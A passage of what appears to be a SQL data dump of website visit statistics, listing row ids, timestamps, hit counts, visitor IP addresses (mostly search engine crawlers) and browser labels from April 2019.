472067,1,1,0,0,'66.249.64.60','chrome'),(413439,1555472853,1,1,0,0,'66.249.64.31','chrome'),(413440,1555473641,1,1,0,0,'5.255.253.38','other'),(413441,1555473680,20,20,0,0,'40.77.167.177','other'),(413442,1555474174,12,12,0,0,'157.55.39.69','other'),(413443,1555474222,14,14,0,0,'157.55.39.190','other'),(413444,1555474332,1,1,0,0,'5.45.207.80','other'),(413445,1555475240,2,2,0,0,'40.77.167.177','other'),(413446,1555476261,2,2,0,0,'66.249.64.31','chrome'),(413447,1555476392,2,2,0,0,'157.55.39.190','other'),(413448,1555477448,3,3,0,0,'46.211.126.29','chrome'),(413449,1555477968,1,1,0,0,'157.55.39.190','other'),(413450,1555479216,1,1,0,0,'185.246.208.35','other'),(413451,1555479227,1,1,0,0,'109.70.100.21','other'),(413452,1555479230,1,1,0,0,'185.246.208.35','chrome'),(413453,1555479465,2,2,0,0,'195.10.210.49','chrome'),(413454,1555479702,1,1,0,0,'95.132.50.180','chrome'),(413455,1555479871,1,1,0,0,'46.200.250.89','chrome'),(413456,1555479963,1,1,0,0,'66.249.64.31','chrome'),(413457,1555480053,2,2,0,0,'8.29.198.26','other'),(413458,1555480058,1,1,0,0,'157.55.39.181','other'),(413459,1555480266,1,1,0,0,'40.77.167.157','other'),(413460,1555480653,2,2,0,0,'141.8.142.191','other'),(413461,1555480680,1,1,0,0,'95.132.50.180','chrome'),(413462,1555480829,3,3,0,0,'91.196.178.87','chrome'),(413463,1555480970,1,1,0,0,'46.133.30.54','other'),(413464,1555480977,1,1,0,0,'93.72.93.35','firefox'),(413465,1555481314,2,2,0,0,'66.249.64.62','chrome'),(413466,1555481355,1,1,0,0,'91.196.179.134','chrome'),(413467,1555481396,1,1,0,0,'91.209.11.236','other'),(413468,1555481963,1,1,0,0,'40.77.167.122','other'),(413469,1555482178,1,1,0,0,'66.249.64.30','chrome'),(413470,1555482183,1,1,0,0,'209.17.96.34','other'),(413471,1555482277,1,1,0,0,'40.77.167.177','other'),(413472,1555482977,1,1,0,0,'66.249.64.29','chrome'),(413473,1555483024,1,1,0,0,'91.196.178.189','chrome'),(413474,1555483397,1,1,0,0,'91.124.182.170','firefox'),(413475,1555483594,1,1,0,0,'66.249.64.31','chrome'),(413476,1555485469,1,1,0,0,'46.211.125.165','chrome'),(413477,1555486224,1,1,0,0,'66.249.64.30','chrome'),(413478,1555486687,1,1,0,0,'193.106.30.98','firefox'),(413479,1555486750,1,1,0,0,'40.77.167.122','other'),(413480,1555487463,1,1,0,0,'180.76.15.135','other'),(413481,1555487565,1,1,0,0,'66.249.64.29','chrome'),(413482,1555488107,1,1,0,0,'92.242.99.138','chrome'),(413483,1555488315,1,1,0,0,'66.249.64.30','chrome'),(413484,1555488393,1,1,0,0,'40.77.167.122','other'),(413485,1555488864,1,1,0,0,'91.196.178.87','chrome'),(413486,1555489234,2,2,0,0,'66.249.64.29','chrome'),(413487,1555489721,1,1,0,0,'212.83.146.233','firefox'),(413488,1555489809,1,1,0,0,'141.8.142.65','other'),(413489,1555489844,1,1,0,0,'5.45.207.19','other'),(413490,1555489878,1,1,0,0,'178.154.244.65','other'),(413491,1555490147,1,1,0,0,'40.77.167.177','other'),(413492,1555490185,1,1,0,0,'5.255.253.22','other'),(413493,1555490394,1,1,0,0,'178.154.244.11','other'),(413494,1555490397,1,1,0,0,'66.249.64.30','chrome'),(413495,1555490592,1,1,0,0,'91.196.178.87','chrome'),(413496,1555490696,1,1,0,0,'66.249.64.31','chrome'),(413497,1555490900,1,1,0,0,'8.29.198.25','other'),(413498,1555491621,1,1,0,0,'109.74.154.72','chrome'),(413499,1555491675,1,1,0,0,'8.29.198.27','other'),(413500,1555492137,1,1,0,0,'66.249.64.29','chrome'),(413501,1555492168,2,2,0,0,'66.249.64.62','chrome'),(413502,1555492182,1,1,0,0,'207.46.13.206','other'),(413503,1555492248,1,1,0,0,'66.249.64.60','chrome'),(413504,1555492859,2,2,0,0,'40.77.167.141','other'),(413505,1555493006,1,1,0,0,'91.196.178.87','chrome'),(413506,1555493614,1,1,0,0,'185.66.91.253','chrome'),(413507,1555493987,1,1,0,0,'40.77.167.76','other'),(413508,1555494362,1,1,0,0,'66.249.64.30','chrome'),(413509,1555495651,1,1,0,0,'40.77.167.122','other'),(413510,1555495695,1,1,0,0,'180.76.15.159','other'),(413511,1555496257,1,1,0,0,'207.46.13.104','other'),(413512,1555497065,2,2,0,0,'95.213.141.126','opera'),(413513,1555497239,1,1,0,0,'40.77.167.122','other'),(413514,1555497849,1,1,0,0,'178.154.244.65','other'),(413515,1555497956,1,1,0,0,'141.8.142.81','other'),(413516,1555499051,1,1,0,0,'66.249.64.29','chrome'),(413517,1555499165,1,1,0,0,'66.249.64.31','chrome'),(413518,1555499373,1,1,0,0,'40.77.167.76','other'),(413519,1555499587,1,1,0,0,'62.4.14.206','firefox'),(413520,1555500937,1,1,0,0,'91.217.244.20','chrome'),(413521,1555500989,1,1,0,0,'178.154.244.11','other'),(413522,1555501311,1,1,0,0,'46.166.190.154','other'),(413523,1555501738,2,2,0,0,'8.29.198.27','other'),(413524,1555501767,1,1,0,0,'107.178.194.30','chrome'),(413525,1555502000,1,1,0,0,'91.196.177.134','chrome'),(413526,1555502336,1,1,0,0,'66.249.64.31','chrome'),(413527,1555503422,1,1,0,0,'66.249.64.31','chrome'),(413528,1555503584,1,1,0,0,'195.230.128.148','firefox'),(413529,1555504453,1,1,0,0,'95.164.56.82','firefox'),(413530,1555504455,1,1,0,0,'46.211.151.247','chrome'),(413531,1555504572,1,1,0,0,'207.46.13.104','other'),(413532,1555505019,1,1,0,0,'66.249.64.29','chrome'),(413533,1555505684,1,1,0,0,'5.45.207.19','other'),(413534,1555505702,1,1,0,0,'91.196.178.87','chrome'),(413535,1555505858,1,1,0,0,'66.249.64.30','chrome'),(413536,1555505896,1,1,0,0,'77.93.46.104','chrome'),(413537,1555506043,1,1,0,0,'46.133.28.240','chrome'),(413538,1555506773,1,1,0,0,'157.55.39.150','other'),(413539,1555506895,1,1,0,0,'66.249.65.212','chrome'),(413540,1555507596,1,1,0,0,'46.164.159.238','chrome'),(413541,1555508261,1,1,0,0,'40.77.167.158','other'),(413542,1555509471,1,1,0,0,'66.249.64.60','chrome'),(413543,1555509968,1,1,0,0,'157.55.39.150','other'),(413544,1555510126,2,2,0,0,'66.249.64.31','chrome'),(413545,1555510595,2,2,0,0,'5.45.207.79','other'),(413546,1555511180,1,1,0,0,'95.134.168.198','chrome'),(413547,1555511311,1,1,0,0,'5.45.207.19','other'),(413548,1555511521,1,1,0,0,'178.154.244.11','other'),(413549,1555511628,1,1,0,0,'141.8.142.108','other'),(413550,1555512622,1,1,0,0,'66.249.64.29','chrome'),(413551,1555512698,2,2,0,0,'8.29.198.25','other'),(413552,1555512729,2,2,0,0,'66.249.64.31','chrome'),(413553,1555512754,2,2,0,0,'66.249.64.30','chrome'),(413554,1555513764,1,1,0,0,'40.77.167.158','other'),(413555,1555513972,2,2,0,0,'66.249.64.58','chrome'),(413556,1555514486,1,1,0,0,'157.55.39.79','other'),(413557,1555515226,1,1,0,0,'91.196.178.166','chrome'),(413558,1555515257,1,1,0,0,'40.77.167.120','other'),(413559,1555516420,2,2,0,0,'66.249.64.30','chrome'),(413560,1555517091,1,1,0,0,'40.77.167.120','other'),(413561,1555517110,1,1,0,0,'137.74.85.74','firefox'),(413562,1555517593,1,1,0,0,'5.45.207.79','other'),(413563,1555517768,1,1,0,0,'178.154.244.11','other'),(413564,1555517939,1,1,0,0,'87.250.224.47','other'),(413565,1555518415,1,1,0,0,'91.196.178.166','chrome'),(413566,1555519063,2,2,0,0,'193.201.224.213','msie'),(413567,1555519240,1,1,0,0,'91.196.178.97','chrome'),(413568,1555519394,1,1,0,0,'46.133.18.78','chrome'),(413569,1555519505,1,1,0,0,'66.249.64.31','chrome'),(413570,1555519822,1,1,0,0,'66.249.64.29','chrome'),(413571,1555519979,1,1,0,0,'13.57.233.99','chrome'),(413572,1555520083,1,1,0,0,'46.211.72.251','chrome'),(413573,1555520664,1,1,0,0,'91.196.178.84','firefox'),(413574,1555520751,1,1,0,0,'207.46.13.71','other'),(413575,1555520753,1,1,0,0,'66.249.64.29','chrome'),(413576,1555521119,2,2,0,0,'66.249.64.31','chrome'),(413577,1555521290,1,1,0,0,'194.44.36.117','chrome'),(413578,1555521355,1,1,0,0,'66.249.64.30','chrome'),(413579,1555521442,1,1,0,0,'207.46.13.36','other'),(413580,1555521711,1,1,0,0,'178.94.219.194','chrome'),(413581,1555522706,1,1,0,0,'5.45.207.19','other'),(413582,1555522708,1,1,0,0,'141.8.142.103','other'),(413583,1555522831,1,1,0,0,'207.46.13.36','other'),(413584,1555523492,1,1,0,0,'91.209.11.236','other'),(413585,1555523564,2,2,0,0,'8.29.198.26','other'),(413586,1555523629,1,1,0,0,'66.249.64.30','chrome'),(413587,1555523900,1,1,0,0,'91.196.178.166','chrome'),(413588,1555524080,1,1,0,0,'5.45.207.19','other'),(413589,1555524206,1,1,0,0,'178.154.244.11','other'),(413590,1555524444,1,1,0,0,'40.77.167.170','other'),(413591,1555524918,1,1,0,0,'52.70.146.155','other'),(413592,1555525004,1,1,0,0,'207.46.13.71','other'),(413593,1555525398,1,1,0,0,'66.249.64.30','chrome'),(413594,1555525771,1,1,0,0,'89.252.21.52','other'),(413595,1555525978,1,1,0,0,'180.76.15.136','other'),(413596,1555526274,2,2,0,0,'207.46.13.71','other'),(413597,1555527958,3,3,0,0,'66.249.64.30','chrome'),(413598,1555528675,1,1,0,0,'66.249.64.29','chrome'),(413599,1555528745,2,2,0,0,'66.249.64.31','chrome'),(413600,1555529587,1,1,0,0,'40.77.167.170','other'),(413601,1555530282,1,1,0,0,'13.66.139.0','other'),(413602,1555530462,1,1,0,0,'66.249.64.30','chrome'),(413603,1555530522,1,1,0,0,'193.106.30.98','firefox'),(413604,1555531530,1,1,0,0,'207.46.13.71','other'),(413605,1555531936,1,1,0,0,'180.76.15.8','other'),(413606,1555532313,1,1,0,0,'66.249.64.31','chrome'),(413607,1555533260,1,1,0,0,'46.96.32.151','chrome'),(413608,1555533433,1,1,0,0,'207.46.13.14','other'),(413609,1555533866,1,1,0,0,'66.249.64.31','chrome'),(413610,1555534376,1,1,0,0,'157.55.39.10','other'),(413611,1555534390,1,1,0,0,'66.249.64.30','chrome'),(413612,1555534414,1,1,0,0,'8.29.198.26','other'),(413613,1555534888,1,1,0,0,'178.154.244.11','other'),(413614,1555534939,1,1,0,0,'207.46.13.71','other'),(413615,1555534960,1,1,0,0,'37.9.113.103','other'),(413616,1555535065,1,1,0,0,'8.29.198.27','other'),(413617,1555535331,1,1,0,0,'5.45.207.79','other'),(413618,1555535336,1,1,0,0,'213.180.203.17','other'),(413619,1555535491,2,2,0,0,'66.249.64.29','chrome'),(413620,1555535548,1,1,0,0,'66.249.64.31','chrome'),(413621,1555535550,1,1,0,0,'141.8.142.103','other'),(413622,1555536035,1,1,0,0,'157.55.39.10','other'),(413623,1555536926,1,1,0,0,'66.249.64.29','chrome'),(413624,1555538190,2,2,0,0,'66.249.64.31','chrome'),(413625,1555540430,1,1,0,0,'37.9.113.148','other'),(413626,1555540652,1,1,0,0,'40.77.167.210','other'),(413627,1555540663,2,2,0,0,'207.46.13.49','other'),(413628,1555540721,1,1,0,0,'5.45.207.79','other'),(413629,1555542435,3,3,0,0,'66.249.64.30','chrome'),(413630,1555542470,1,1,0,0,'66.249.64.29','chrome'),(413631,1555543614,1,1,0,0,'178.255.215.94','other'),(413632,1555544379,1,1,0,0,'40.77.167.14','other'),(413633,1555544923,2,2,0,0,'207.46.13.189','other'),(413634,1555545319,2,2,0,0,'8.29.198.26','other'),(413635,1555545466,1,1,0,0,'193.106.30.98','firefox'),(413636,1555545903,1,1,0,0,'95.108.213.4','other'),(413637,1555546010,1,1,0,0,'66.249.64.30','chrome'),(413638,1555546177,2,2,0,0,'178.154.244.11','other'),(413639,1555546260,1,1,0,0,'141.8.142.103','other'),(413640,1555546289,1,1,0,0,'66.249.64.62','chrome'),(413641,1555546303,2,2,0,0,'66.249.64.58','chrome'),(413642,1555546467,1,1,0,0,'66.249.64.29','chrome'),(413643,1555546795,1,1,0,0,'207.46.13.49','other'),(413644,1555547613,1,1,0,0,'176.120.237.112','chrome'),(413645,1555549287,1,1,0,0,'40.77.167.121','other'),(413646,1555551261,1,1,0,0,'91.209.11.236','other'),(413647,1555554685,1,1,0,0,'13.66.139.0','other'),(413648,1555554787,1,1,0,0,'93.72.93.35','firefox'),(413649,1555555283,1,1,0,0,'66.249.64.31','chrome'),(413650,1555555902,1,1,0,0,'157.55.39.173','other'),(413651,1555556168,2,2,0,0,'8.29.198.27','other'),(413652,1555556691,1,1,0,0,'40.77.167.121','other'),(413653,1555556698,2,2,0,0,'34.212.36.16','chrome'),(413654,1555556845,2,2,0,0,'157.55.39.173','other'),(413655,1555557238,1,1,0,0,'178.154.244.11','other'),(413656,1555557361,1,1,0,0,'5.45.207.79','other'),(413657,1555557626,1,1,0,0,'178.171.74.71','chrome'),(413658,1555558187,1,1,0,0,'157.55.39.173','other'),(413659,1555559225,1,1,0,0,'157.55.39.84','other'),(413660,1555560009,1,1,0,0,'157.55.39.254','other'),(413661,1555560160,1,1,0,0,'52.53.201.78','chrome'),(413662,1555560689,1,1,0,0,'66.249.64.31','chrome'),(413663,1555561027,1,1,0,0,'157.55.39.173','other'),(413664,1555561430,1,1,0,0,'104.148.64.26','chrome'),(413665,1555562454,1,1,0,0,'157.55.39.114','other'),(413666,1555562778,1,1,0,0,'66.249.64.29','chrome'),(413667,1555563009,1,1,0,0,'93.124.95.219','chrome'),(413668,1555564499,1,1,0,0,'180.163.220.5','other'),(413669,1555564649,1,1,0,0,'5.45.207.19','other'),(413670,1555564743,1,1,0,0,'66.249.64.30','chrome'),(413671,1555564764,1,1,0,0,'157.55.39.114','other'),(413672,1555565079,1,1,0,0,'213.180.203.40','other'),(413673,1555565284,1,1,0,0,'192.42.116.16','other'),(413674,1555565294,1,1,0,0,'66.249.64.29','chrome'),(413675,1555566240,1,1,0,0,'66.249.64.30','chrome'),(413676,1555566281,1,1,0,0,'185.200.60.16','chrome'),(413677,1555566318,1,1,0,0,'91.196.179.134','chrome'),(413678,1555567039,1,1,0,0,'8.29.198.26','other'),(413679,1555567541,1,1,0,0,'8.29.198.27','other'),(413680,1555568127,1,1,0,0,'5.45.207.19','other'),(413681,1555568190,1,1,0,0,'66.249.64.58','chrome'),(413682,1555568517,101,101,0,0,'148.251.92.39','other'),(413683,1555568748,2,2,0,0,'139.99.222.34','firefox'),(413684,1555569151,1,1,0,0,'40.77.167.35','other'),(413685,1555569420,99,99,0,0,'148.251.92.39','other'),(413686,1555570336,1,1,0,0,'46.200.250.89','chrome'),(413687,1555570637,1,1,0,0,'178.92.207.102','chrome'),(413688,1555571326,1,1,0,0,'91.196.178.87','chrome'),(413689,1555572059,1,1,0,0,'40.77.167.36','other'),(413690,1555572592,1,1,0,0,'193.106.30.98','firefox'),(413691,1555572938,1,1,0,0,'91.196.177.110','firefox'),(413692,1555573034,1,1,0,0,'40.77.167.27','other'),(413693,1555573995,1,1,0,0,'5.45.207.19','other'),(413694,1555574314,1,1,0,0,'40.77.167.27','other'),(413695,1555574822,1,1,0,0,'37.9.113.13','other'),(413696,1555575007,1,1,0,0,'95.108.181.83','other'),(413697,1555575199,1,1,0,0,'157.55.39.205','other'),(413698,1555575228,1,1,0,0,'5.45.207.79','other'),(413699,1555575529,1,1,0,0,'40.77.167.27','other'),(413700,1555575635,1,1,0,0,'95.135.215.222','chrome'),(413701,1555575850,1,1,0,0,'46.200.250.89','chrome'),(413702,1555575919,1,1,0,0,'66.249.64.60','chrome'),(413703,1555576471,1,1,0,0,'207.46.13.202','other'),(413704,1555577568,1,1,0,0,'91.196.178.90','other'),(413705,1555577903,1,1,0,0,'8.29.198.26','other'),(413706,1555578127,1,1,0,0,'109.74.154.72','chrome'),(413707,1555578185,1,1,0,0,'157.55.39.233','other'),(413708,1555578197,1,1,0,0,'5.45.207.19','other'),(413709,1555578363,1,1,0,0,'157.55.39.149','other'),(413710,1555578364,1,1,0,0,'8.29.198.27','other'),(413711,1555578365,1,1,0,0,'66.249.64.29','chrome'),(413712,1555579142,1,1,0,0,'157.55.39.233','other'),(413713,1555579208,1,1,0,0,'91.196.178.101','chrome'),(413714,1555580104,1,1,0,0,'46.149.89.148','chrome'),(413715,1555580139,2,2,0,0,'42.236.10.75','other'),(413716,1555580202,1,1,0,0,'42.236.10.125','other'),(413717,1555580207,1,1,0,0,'42.236.10.106','other'),(413718,1555580259,2,2,0,0,'91.196.178.87','chrome'),(413719,1555580624,1,1,0,0,'5.45.207.19','other'),(413720,1555580771,2,2,0,0,'66.249.64.60','chrome'),(413721,1555581489,1,1,0,0,'66.249.64.31','chrome'),(413722,1555581943,1,1,0,0,'212.26.139.82','firefox'),(413723,1555582472,1,1,0,0,'157.55.39.149','other'),(413724,1555583373,1,1,0,0,'91.196.178.67','chrome'),(413725,1555584296,1,1,0,0,'157.55.39.149','other'),(413726,1555584583,1,0,1,0,'66.249.64.31',''),(413727,1555584947,1,1,0,0,'185.143.147.241','chrome'),(413728,1555585598,1,1,0,0,'66.249.64.58','chrome'),(413729,1555585615,1,1,0,0,'66.249.64.31','chrome'),(413730,1555585854,1,1,0,0,'46.200.250.89','chrome'),(413731,1555586882,1,1,0,0,'207.46.13.82','other'),(413732,1555587017,2,2,0,0,'66.249.64.29','chrome'),(413733,1555587175,1,1,0,0,'46.211.135.50','chrome'),(413734,1555588110,2,2,0,0,'66.249.64.30','chrome'),(413735,1555588767,2,2,0,0,'8.29.198.26','other'),(413736,1555588819,1,1,0,0,'66.249.64.58','chrome'),(413737,1555589191,1,1,0,0,'193.106.30.98','firefox'),(413738,1555589570,1,1,0,0,'180.76.15.137','other'),(413739,1555589720,1,1,0,0,'157.55.39.133','other'),(413740,1555590451,1,1,0,0,'91.196.178.87','chrome'),(413741,1555590524,1,1,0,0,'207.46.13.104','other'),(413742,1555590752,1,1,0,0,'66.249.64.29','chrome'),(413743,1555590850,1,1,0,0,'66.249.64.60','chrome'),(413744,1555591236,2,2,0,0,'207.46.13.82','other'),(413745,1555591639,2,2,0,0,'207.46.13.103','other'),(413746,1555591826,1,1,0,0,'95.220.40.169','msie'),(413747,1555592073,1,1,0,0,'207.46.13.104','other'),(413748,1555592288,1,1,0,0,'91.196.178.87','chrome'),(413749,1555592636,1,1,0,0,'66.249.64.31','chrome'),(413750,1555593787,1,1,0,0,'46.211.111.161','chrome'),(413751,1555594375,1,1,0,0,'91.196.178.87','chrome'),(413752,1555594377,1,1,0,0,'207.46.13.156','other'),(413753,1555594927,1,1,0,0,'66.249.64.30','chrome'),(413754,1555595041,2,2,0,0,'40.77.167.181','other'),(413755,1555595073,1,1,0,0,'176.122.117.145','chrome'),(413756,1555595193,1,1,0,0,'193.106.30.98','firefox'),(413757,1555595350,1,1,0,0,'40.77.167.174','other'),(413758,1555597185,1,1,0,0,'40.77.167.181','other'),(413759,1555597409,1,1,0,0,'157.55.39.66','other'),(413760,1555597762,1,1,0,0,'66.249.64.29','chrome'),(413761,1555598278,1,1,0,0,'95.163.255.98','other'),(413762,1555598361,1,1,0,0,'66.249.64.62','chrome'),(413763,1555599306,1,1,0,0,'66.249.64.29','chrome'),(413764,1555599647,1,1,0,0,'8.29.198.25','other'),(413765,1555600045,1,1,0,0,'8.29.198.27','other'),(413766,1555600899,1,1,0,0,'91.196.178.165','chrome'),(413767,1555601368,1,1,0,0,'40.77.167.21','other'),(413768,1555601619,1,1,0,0,'66.249.64.30','chrome'),(413769,1555602468,1,1,0,0,'87.250.224.47','other'),(413770,1555602905,1,1,0,0,'66.249.64.29','chrome'),(413771,1555603217,1,1,0,0,'40.77.167.174','other'),(413772,1555604242,1,1,0,0,'207.46.13.216','other'),(413773,1555604322,1,1,0,0,'141.8.142.103','other'),(413774,1555604782,1,1,0,0,'37.204.67.170','msie'),(413775,1555604784,1,1,0,0,'5.228.124.110','msie'),(413776,1555605095,1,1,0,0,'46.211.133.14','chrome'),(413777,1555605186,1,1,0,0,'207.46.13.220','other'),(413778,1555605523,1,1,0,0,'66.249.64.62','chrome'),(413779,1555606739,2,2,0,0,'178.154.244.11','other'),(413780,1555607577,1,1,0,0,'46.96.34.96','chrome'),(413781,1555608257,1,1,0,0,'207.46.13.218','other'),(413782,1555609618,1,1,0,0,'93.119.227.91','chrome'),(413783,1555609619,1,1,0,0,'93.119.227.91','other'),(413784,1555610510,2,2,0,0,'8.29.198.26','other'),(413785,1555611343,1,1,0,0,'193.106.30.98','firefox'),(413786,1555613048,1,1,0,0,'40.77.167.158','other'),(413787,1555613832,1,1,0,0,'87.250.224.64','other'),(413788,1555614064,1,1,0,0,'157.55.39.193','other'),(413789,1555614290,1,1,0,0,'5.45.207.19','other'),(413790,1555614316,1,1,0,0,'178.154.244.11','other'),(413791,1555614361,3,3,0,0,'5.45.207.79','other'),(413792,1555614363,1,1,0,0,'91.196.178.37','chrome'),(413793,1555614519,1,1,0,0,'157.55.39.221','other'),(413794,1555615839,1,1,0,0,'178.154.244.11','other'),(413795,1555615856,1,1,0,0,'157.55.39.221','other'),(413796,1555616342,1,1,0,0,'95.108.181.94','other'),(413797,1555617795,1,1,0,0,'5.45.207.76','other'),(413798,1555617891,1,1,0,0,'66.249.64.58','chrome'),(413799,1555618379,1,1,0,0,'157.55.39.221','other'),(413800,1555619042,1,1,0,0,'66.249.64.29','chrome'),(413801,1555620889,1,1,0,0,'207.46.13.51','other'),(413802,1555621371,1,1,0,0,'8.29.198.27','other'),(413803,1555621721,1,1,0,0,'8.29.198.26','other'),(413804,1555624274,1,1,0,0,'66.249.64.30','chrome'),(413805,1555624340,1,1,0,0,'178.154.244.11','other'),(413806,1555624391,1,1,0,0,'87.250.224.47','other'),(413807,1555624402,1,1,0,0,'157.55.39.146','other'),(413808,1555624404,1,1,0,0,'5.45.207.79','other'),(413809,1555624737,1,1,0,0,'95.108.213.4','other'),(413810,1555624942,1,1,0,0,'141.8.142.103','other'),(413811,1555625342,1,1,0,0,'178.154.244.11','other'),(413812,1555626747,1,1,0,0,'66.249.64.29','chrome'),(413813,1555627714,1,1,0,0,'193.106.30.98','firefox'),(413814,1555628361,2,2,0,0,'157.55.39.193','other'),(413815,1555628851,65,65,0,0,'178.63.11.212','other'),(413816,1555628891,88,88,0,0,'51.38.115.3','other'),(413817,1555629417,1,1,0,0,'144.76.90.142','other'),(413818,1555629760,83,83,0,0,'178.63.11.212','other'),(413819,1555629921,1,1,0,0,'207.46.13.51','other'),(413820,1555630482,1,1,0,0,'40.77.167.217','other'),(413821,1555630646,1,1,0,0,'178.154.171.17','other'),(413822,1555630665,39,39,0,0,'178.63.11.212','other'),(413823,1555632239,2,2,0,0,'8.29.198.26','other'),(413824,1555632831,2,2,0,0,'40.77.167.10','other'),(413825,1555634828,1,1,0,0,'66.249.64.29','chrome'),(413826,1555634832,1,1,0,0,'66.249.64.30','chrome'),(413827,1555634954,1,1,0,0,'13.66.139.0','other'),(413828,1555635561,1,1,0,0,'157.55.39.193','other'),(413829,1555635740,1,1,0,0,'40.77.167.10','other'),(413830,1555636877,1,1,0,0,'40.77.167.10','other'),(413831,1555637898,1,1,0,0,'95.24.201.54','msie'),(413832,1555637966,1,1,0,0,'95.108.181.94','other'),(413833,1555639266,1,1,0,0,'193.106.30.98','firefox'),(413834,1555639293,1,1,0,0,'180.76.15.159','other'),(413835,1555640425,1,1,0,0,'207.46.13.193','other'),(413836,1555640626,1,1,0,0,'207.46.13.99','other'),(413837,1555642136,1,1,0,0,'5.45.207.79','other'),(413838,1555642335,2,2,0,0,'207.46.13.51','other'),(413839,1555642339,1,1,0,0,'93.119.227.19','chrome'),(413841,1555642341,2,2,0,0,'69.4.89.106','other'),(413842,1555642383,1,1,0,0,'95.108.213.50','other'),(413843,1555642385,1,1,0,0,'69.4.87.74','chrome'),(413845,1555642388,1,1,0,0,'213.180.203.48','other'),(413846,1555642414,1,1,0,0,'141.8.183.11','other'),(413847,1555642682,1,1,0,0,'178.154.244.11','other'),(413848,1555642835,1,1,0,0,'178.154.171.69','other'),(413849,1555643095,1,1,0,0,'8.29.198.26','other'),(413850,1555643384,1,1,0,0,'8.29.198.27','other'),(413851,1555643415,1,1,0,0,'141.8.142.38','other'),(413852,1555643610,1,1,0,0,'93.119.227.34','other'),(413853,1555643611,1,1,0,0,'93.119.227.34','chrome'),(413854,1555644279,1,1,0,0,'207.46.13.99','other'),(413855,1555645071,1,1,0,0,'193.106.30.98','firefox'),(413856,1555647873,1,1,0,0,'52.70.146.155','other'),(413857,1555647997,1,1,0,0,'148.251.120.201','other'),(413858,1555648452,1,1,0,0,'66.249.64.30','chrome'),(413859,1555648536,1,1,0,0,'40.77.167.10','other'),(413860,1555648644,1,1,0,0,'158.69.23.126','other'),(413861,1555649570,1,1,0,0,'207.46.13.99','other'),(413862,1555649699,1,1,0,0,'66.249.64.29','chrome'),(413863,1555650492,1,1,0,0,'5.188.45.160','chrome'),(413864,1555651191,1,1,0,0,'37.9.113.148','other'),(413865,1555651346,1,1,0,0,'185.100.86.182','other'),(413866,1555651442,1,1,0,0,'34.219.166.219','other'),(413867,1555651590,1,1,0,0,'5.188.210.44','chrome'),(413868,1555651941,1,1,0,0,'5.45.207.79','other'),(413869,1555652185,1,1,0,0,'46.200.250.89','chrome'),(413870,1555652656,2,2,0,0,'157.55.39.232','other'),(413871,1555653949,2,2,0,0,'8.29.198.25','other'),(413872,1555654260,1,1,0,0,'66.249.64.30','chrome'),(413873,1555655353,1,1,0,0,'66.249.64.31','chrome'),(413874,1555655488,7,7,0,0,'5.9.108.254','other'),(413875,1555656410,1,1,0,0,'180.76.15.27','other'),(413876,1555656423,2,2,0,0,'54.218.58.140','chrome'),(413877,1555657351,1,1,0,0,'207.46.13.99','other'),(413878,1555657693,2,2,0,0,'144.76.96.236','other'),(413879,1555658413,1,1,0,0,'180.76.15.152','other'),(413880,1555658589,1,1,0,0,'207.46.13.208','other'),(413881,1555659088,1,1,0,0,'157.55.39.167','other'),(413882,1555659698,1,1,0,0,'66.249.64.31','chrome'),(413883,1555660416,3,3,0,0,'91.196.178.77','firefox'),(413884,1555661445,1,1,0,0,'13.66.139.0','other'),(413885,1555661524,1,1,0,0,'207.46.13.208','other'),(413886,1555662095,1,1,0,0,'157.55.39.167','other'),(413887,1555662252,1,1,0,0,'193.106.30.98','firefox'),(413888,1555662805,2,2,0,0,'207.46.13.208','other'),(413889,1555662945,1,1,0,0,'13.66.139.0','other'),(413890,1555663002,1,1,0,0,'95.108.213.4','other'),(413891,1555663220,1,1,0,0,'37.9.113.103','other'),(413892,1555663271,1,1,0,0,'141.8.142.103','other'),(413893,1555663358,3,3,0,0,'178.154.244.11','other'),(413894,1555664119,1,1,0,0,'95.221.137.247','msie'),(413895,1555664168,1,1,0,0,'95.108.213.4','other'),(413896,1555664346,1,1,0,0,'207.46.13.99','other'),(413897,1555664378,1,1,0,0,'78.152.169.32','chrome'),(413898,1555664405,1,1,0,0,'109.74.154.72','chrome'),(413899,1555664480,1,1,0,0,'5.45.207.79','other'),(413900,1555664812,1,1,0,0,'8.29.198.25','other'),(413901,1555665061,1,1,0,0,'8.29.198.26','other'),(413902,1555665847,1,1,0,0,'157.55.39.68','other'),(413903,1555666691,1,1,0,0,'91.209.55.69','chrome'),(413904,1555666775,1,1,0,0,'5.45.207.19','other'),(413905,1555666971,1,1,0,0,'66.249.64.62','chrome'),(413906,1555668067,1,1,0,0,'193.106.30.98','firefox'),(413907,1555668452,1,1,0,0,'91.196.178.101','chrome'),(413908,1555670372,1,1,0,0,'207.46.13.183','other'),(413909,1555670769,1,1,0,0,'207.46.13.85','other'),(413910,1555670905,1,1,0,0,'217.69.3.203','chrome'),(413911,1555670989,1,1,0,0,'46.96.20.113','chrome'),(413912,1555671470,1,1,0,0,'207.46.13.181','other'),(413913,1555671695,1,1,0,0,'207.46.13.211','other'),(413914,1555671862,1,1,0,0,'13.66.139.0','other'),(413915,1555671907,1,1,0,0,'185.143.147.59','chrome'),(413916,1555672074,1,1,0,0,'207.46.13.183','other'),(413917,1555672295,6,6,0,0,'95.216.19.59','other'),(413918,1555672404,1,1,0,0,'180.76.15.135','other'),(413919,1555672836,1,1,0,0,'91.196.178.180','chrome'),(413920,1555673458,1,1,0,0,'66.249.66.218','chrome'),(413921,1555673614,1,1,0,0,'157.55.39.247','other'),(413922,1555673906,1,1,0,0,'207.46.13.211','other'),(413923,1555674056,1,1,0,0,'178.154.244.11','other'),(413924,1555674560,1,1,0,0,'193.106.30.98','firefox'),(413925,1555674782,1,1,0,0,'13.66.139.0','other'),(413926,1555675659,2,2,0,0,'8.29.198.27','other'),(413927,1555675937,1,1,0,0,'157.55.39.247','other'),(413928,1555676528,1,0,1,0,'66.249.66.222',''),(413929,1555676730,1,1,0,0,'157.55.39.61','other'),(413930,1555676963,1,1,0,0,'207.46.13.183','other'),(413931,1555677590,1,1,0,0,'157.55.39.247','other'),(413932,1555678961,1,1,0,0,'207.46.13.181','other'),(413933,1555681333,1,1,0,0,'66.249.66.82','chrome'),(413934,1555681473,1,1,0,0,'207.46.13.183','other'),(413935,1555682675,1,1,0,0,'91.196.178.101','chrome'),(413936,1555682918,1,1,0,0,'157.55.39.247','other'),(413937,1555684309,1,1,0,0,'40.77.167.109','other'),(413938,1555684607,1,1,0,0,'157.55.39.247','other'),(413939,1555685182,1,1,0,0,'180.76.15.11','other'),(413940,1555686513,1,1,0,0,'8.29.198.27','other'),(413941,1555686735,1,1,0,0,'8.29.198.25','other'),(413942,1555686742,1,1,0,0,'178.154.244.11','other'),(413943,155568